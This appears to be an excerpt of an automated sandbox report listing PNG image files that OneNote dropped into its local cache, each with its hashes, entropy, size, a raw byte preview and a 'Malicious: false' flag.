Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000041.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000042.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000043.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000044.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000045.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000046.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000047.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000048.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000049.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004B.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004C.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004D.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004E.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004F.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
